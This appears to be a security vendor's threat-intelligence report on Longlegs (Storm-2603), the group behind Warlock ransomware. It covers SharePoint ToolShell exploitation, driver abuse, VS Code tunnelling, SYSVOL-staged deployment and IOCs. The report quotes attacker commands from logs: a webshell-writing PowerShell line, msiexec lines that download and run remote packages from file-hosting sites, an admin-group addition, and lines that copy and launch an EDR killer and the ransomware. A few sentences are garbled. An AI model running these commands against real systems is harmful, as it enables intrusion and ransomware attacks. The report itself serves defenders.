Key findings
- Warlock first came to prominence via the exploitation of a Microsoft SharePoint “ToolShell” exploit chain.
- Warlock is developed by a China-nexus threat actor Symantec calls Longlegs (aka Storm-2603). Symantec has previously tied this group to older activity clusters known as CL-CRI-1040, CamoFei, and ChamelGang.
- In the past two months, Longlegs has attacked at least four organizations, including two critical infrastructure operators (a water utility and a telecommunications provider), a regional government body, and a university. Victims were in Portuguese- and Spanish-speaking countries, spanning Europe, Africa, and Latin America.
- The group continues to favor SharePoint-related vulnerabilities to gain initial access to targeted organizations.
- Longlegs abuses a vulnerable, signed driver (K7RKScan) to disable security software before deploying ransomware, and has also been observed abusing Visual Studio Code’s tunneling feature for covert remote access.
The China-nexus group behind Warlock ransomware is still breaking into organizations through Microsoft SharePoint vulnerabilities, a tactic that brought it to prominence a year ago. In the past two months, the group, which Symantec tracks as Longlegs (aka Storm-2603), attacked at least four organizations in Portuguese- and Spanish-speaking countries across Europe, Africa, and Latin America. The victims included two critical infrastructure operators, a water utility and a telecommunications provider, along with a regional government body and a university.
Warlock emerged in June 2025 and hit the headlines weeks later, when attackers deploying it were found exploiting zero-day vulnerabilities in Microsoft SharePoint Server, dubbed “ToolShell” (CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771). Those flaws likely remain in the group’s arsenal, alongside newer SharePoint flaws, which the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned about in an advisory published in July 2026.
In one intrusion against a critical infrastructure operator, the attackers pushed a tool designed to disable security software to at least 40 hosts within about two hours, then deployed Warlock on at least 33 hosts by staging it in the domain’s SYSVOL share, where ordinary domain replication delivered it to machines.
Targeting
The concentration of recent victims in Portuguese- and Spanish-speaking countries is noteworthy. Warlock ransomware activity has previously been observed against organizations in a wider range of countries, including the United States, Brazil, India, Russia, Taiwan, and Japan.
Initial access
Longlegs typically gains initial access by exploiting multiple vulnerabilities in on-premises Microsoft SharePoint Server deployments. Once inside, the group drops a webshell into the SharePoint LAYOUTS directory for multiple SharePoint versions at once, ensuring the webshell will function regardless of which version is actually installed. The webshell’s function is to harvest the SharePoint farm’s ASP.NET machine keys, which the attackers then use to forge a validly signed payload that achieves remote code execution inside the SharePoint application pool.
DLL sideloading and defense evasion
The group uses DLL sideloading to load malicious code into memory, and downloads follow-on payloads from legitimate cloud file-sharing and storage services such as catbox[.]moe and wasabisys[.]com, blending its network activities into normal traffic to evade detection. To disable security software ahead of deploying ransomware, Longlegs abuses K7RKScan, a signed but vulnerable driver (CVE-2025-1055) that can be used to terminate protected security processes at the kernel level, a clear example of the bring-your-own-vulnerable-driver (BYOVD) technique.
Living off the land and covert remote access
Longlegs makes heavy use of living-off-the-land tooling to carry out reconnaissance and execute commands on compromised hosts. The group has also been observed abusing Visual Studio Code’s built-in tunnel feature, installing the code-insiders.exe binary as a service to establish covert remote network access that blends into traffic that typically originates from developer or administrator workstations.
Ransomware deployment
To deploy ransomware at scale, Longlegs stages its payloads inside the compromised domain’s SYSVOL share, a location that is automatically replicated to every domain controller and readable domain-wide. This lets the group push the ransomware out for execution across many machines on a victim’s network at once, rather than one host at a time.
Attack chain: Intrusion against a critical infrastructure organization
In recent campaigns, the initial infection vector used by the attackers was likely exploitation of vulnerabilities in Microsoft SharePoint Server. The first observed malicious activity occurred on July 22, 2026, when a webshell was installed on the SharePoint server (Computer 1):
powershell -nop -c "[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"
Malicious activity resumed on July 24 when a number of reconnaissance commands (net user /domain and whoami) were run on a second SharePoint host (Computer 2).
Later the same day, the attackers deleted a handful of numerically-named files from the Public profile and ProgramData directories on both Computer 1 and Computer 2, including a file named doexeloc.dll, apparently tidying up early staging artifacts.
Shortly afterwards, the attackers deployed two executables named ssvagent.exe and logger.exe in a subdirectory of the Windows system folder (CSIDL_SYSTEM409) on Computer 2 before being copied into ProgramData. The executables appeared to be used for DLL-sideloading since two DLLs were deployed alongside them (gsdll64.dll.tmp and doexeloc.dll.tmp). A separate side-loading pair was dropped directly by the SharePoint worker process on Computer 1 around the same time: doexe.exe, alongside another DLL file, doexeloc.dll. At the same time the attackers ran nltest /domain_trusts to enumerate the victim’s Active Directory domain trust relationships.
"CSIDL_SYSTEMnltest.exe" /domain_trusts
Three days later, on July 27, Computer 2 issued an outbound web request to a subdomain of oastify.com, the domain used by vulnerability detection service Burp Collaborator for out-of-band interaction testing:
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://www.[TARGET_DOMAIN].{RANDOM].oastify[.]com'
The target’s own domain name was baked into the collaborator subdomain, which is consistent with a scanning tool using a per-target canary URL to confirm that a specific host had successfully executed injected code, rather than any legitimate business purpose.
On the morning of July 28, the attackers returned to Computer 2 to re-test the webshell. The exploitation chain proper began that afternoon. Computer 1 executed the following base64-encoded PowerShell command, repeated at regular intervals:
"CSIDL_SYSTEMcmd.exe" /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35')
The command loads an assembly whose exposed types provide the deserialization gadget that is used to turn a forged, machine-key-signed __VIEWSTATE payload into arbitrary code execution inside the SharePoint application pool. The same sequence also fired on Computer 2 twice that afternoon.
With code execution established, the attackers moved to fetch follow-on payloads. Computer 2 ran msiexec against two separate URLs in immediate succession, and a third, differently-named package eighty minutes later:
msiexec.exe /q /i "https://litter.catbox[.]moe/6f5tdt.msi" msiexec.exe /q /i "https://s3.wasabisys[.]com/fortifs/vamd64.msi" msiexec /q /i https://xn8xyt-drop.s3.wasabisys[.]com/xn8xyt.msi
Two different public hosting services and three distinct package names within the space of ninety minutes suggests the attackers had more than one payload ready to go and were not relying on a single point of delivery.
The intrusion then broadened from the two initial SharePoint servers to the wider domain. Later that day and into the next (July 29) the attackers repeatedly added a domain account named SPSEPRDSetup to the local Administrators group on three further hosts (Computer 3, Computer 4, and Computer 5):
net localgroup administrators SPSEPRDSetup /add
The account name is likely an attempt at masquerading. SharePoint commonly provisions service accounts with names following an SPS/SP-prefixed setup.
On Computer 4, the attackers installed a persistence and remote-access mechanism of a different kind, using Visual Studio Code’s built-in tunnel feature rather than a bespoke remote-access tool:
"CSIDL_WINDOWSdebugcode-insiders.exe" tunnel service install --accept-server-license-terms
Because the VS Code Insiders binary is signed by Microsoft and the tunnel relays through Microsoft’s own infrastructure, this approach can blend more easily into the kind of outbound traffic already expected from developer or IT-administrator workstations.
Later that evening Computer 2 ran NetExec (nxc.exe), the open-ion testing framework. It was used for Active Directory enumeration, credential spraying, and remote command execution, suggesting the attackers were now mapping and moving across the wider domain
Through July 30 and into the early hours of July 31, the only activity recorded was the doexeloc.dll/doexe.exe side-loading pair reappearing on Computer 1, consistent with a side-loaded component continuing to run in the background.
The intrusion moved to its final phase in the early hours of July 31. The attackers pushed an AV/EDR-killing tool (a.exe), which likely leveraged a vulnerable driver, out to multiple hosts in rapid succession, using a consistent one-line pattern that mapped a network share hosted on an internal IP address, copied a local tool set from it, and launched it:
"CSIDL_WINDOWS cmd.exe" /c net use \[IP_ADDRESS] [REMOVED] /user:[REMOVED] & copy \[IP_ADDRESS]av* CSIDL_PROFILEpublic /y & start /B cmd /c "c:userspublica.exe log 2>nul || exit"
The identity of the vulnerable driver remains unknown but in other recent attacks, the group used the K7RKScan vulnerable driver. A similar command ran on Computer 4 and Computer 6, and the resulting AV/EDR Killer execution was recorded on at least 40 further hosts within about two hours, indicating the tool was pushed out across almost the entire environment rather than a handful of targeted machines.
The Warlock ransomware began appearing almost as soon as protection was disabled on each host. Two binaries, run.exe and rune.exe, together with a ransom note titled “how to restore your files.txt,” were recorded on at least 33 hosts across the organization.
"CSIDL_SYSTEMcmd.exe" /c copy \[REMOVED]SYSVOL[VICTIM DOMAIN]scriptsrun* CSIDL_PROFILEpublic /y & start /B cmd /c "c:userspublicrun.exe 2>nul || exit" & start /B cmd /c "c:userspublicrune.exe 2>nul || exit"
Staging the payload inside the domain’s SYSVOL share, a location that is automatically replicated to every domain controller and readable domain-wide, is a known method of pushing a payload out for execution by a logon script or Group Policy object across an entire network at once, rather than one host at a time.
Data from three further hosts directly captured this mechanism in action, recording the Distributed File System Replication service (dfsrs.exe), the process responsible for replicating SYSVOL between domain controllers, as the parent that delivered run.exe and rune.exe from the same CSIDL_WINDOWS SYSVOLdomainscriptsrun path, confirming that the payload reached those hostsanism
Significance
Longlegs’ continued activity, more than a year after Warlock ransomware first came to prominence, shows that exploitation of ToolShell and other related-SharePoint vulnerabilities remains a viable initial access route for attackers SharePoint deployments that have not been patched or otherwise mitigated.
The apparent recent focus on Portuguese- and Spanish-speaking countries suggests either an opportunistic targeting pattern driven by exposed, vulnerable SharePoint servers, or a more deliberate tasking. The inclusion of critical infrastructure operators among the victims is a reminder of the potential real-world consequences of ransomware attacks that succeed against essential services.
Protection
Symantec CBX, our unified XDR platform, provides multiple layers of defense against attacks like this. Its Adaptive Protection capability can automatically flag and block anomalous use of legitimate living-off-the-land tools (net, whoami, nltest). CBX’s Threat Tracer gives analysts a single view of an attacker’s full workflow, making it easier to spot early footholds before they escalate to domain-wide SYSVOL staging. Its Incident Prediction feature can anticipate an attacker’s likely next moves, while the AI Security Assistant matches observed behavior against known ransomware TTPs, helping teams intervene before Warlock deploys at scale. To find out more read our blog: Symantec CBX is Here.
If an indicator of compromise (IOC) is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.
Indicators of Compromise
File indicators
116ca4e88a1bcebb6c0da7fb431c8eca7b8ef3f9767194820c56091972ccac2c – Warlock
155fb1cbdaea12c83ba92d18c88cf38bbc42bb684f913ca0bc26fcf115426a55 – Warlock
1edb2c0b537cd95bbd5fc16321b4c38a6adf325ccc7b588ad6acc980b0463b60 – Malicious DLL
206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261 – Malicious DLL
27b7591cf9e1283010ca98fa5dbe970a73fee0d8cde277639924c144718db7c0 – Malicious DLL
37f94fe1b4a106f02b6f74a69cbc05e69c17406f688beef4c9a045ffcbd2e65e – Suspicious file
6d07f1232dc59b84038fd0b2e75fdd3d5b825882bb0dba9e6724b7b0823fa3ad – Warlock
73c5268256c9da5488cd9e2b79013060ac321c7e54129344dc7b51e268af36ea – AV/EDR Killer
8b58f7811a2a2f2a5024220490473774f02759dd2dd904b5b9fabfbaae37125f – Warlock
8ce8d8270ee9de02644530b8dd7fa78973b4a3b80f121e2c5f45ae68cce196f9 – Warlock
9ceb01f8bf7d6dba2ae07f5bd6070de3ec67b5eb01f969b0ba85e74564fb83a7 – Suspicious file
aaff04d84ef85353966aa4af186ff1254b72c068f33f802417b29dc23fb9f192 – Suspicious file
ae9f7fce57c7b928e659dccf0e00fa79cd9cd61a106f18d4e03f92dc3a03c295 – Vulnerable driver
c46825fcc0d1bf7a8b192facb176d6bf916c9dccfd6fa994be691e3b0e585f4e – Malicious DLL
e14240bac8277b0f6dd4d29ab5da20d246bcccae647e5fe8d19cdae7fe471b20 – Malicious DLL
e3204b05e2f3a29bb6e6fcc21dda77d7cd31dfa755c21da0aa8661b5619ee0a1 – Suspicious file
eea631b5f7125239db0811e4682c2316ead69f9822e02d94fb5d8bf0d2faebed – Suspicious file
f7269f80f81e99d06a590d7ab374e12fdf7e5f55a02c2a46c342d670f8519fdf – Suspicious file
fb3846c9ac53d1b841ada3a6b1091153fea41a169cb44fe0084097d1f4d45984 – Malicious DLL
Network IOCs
xn8xyt-drop[.]s3[.]wasabisys[.]com
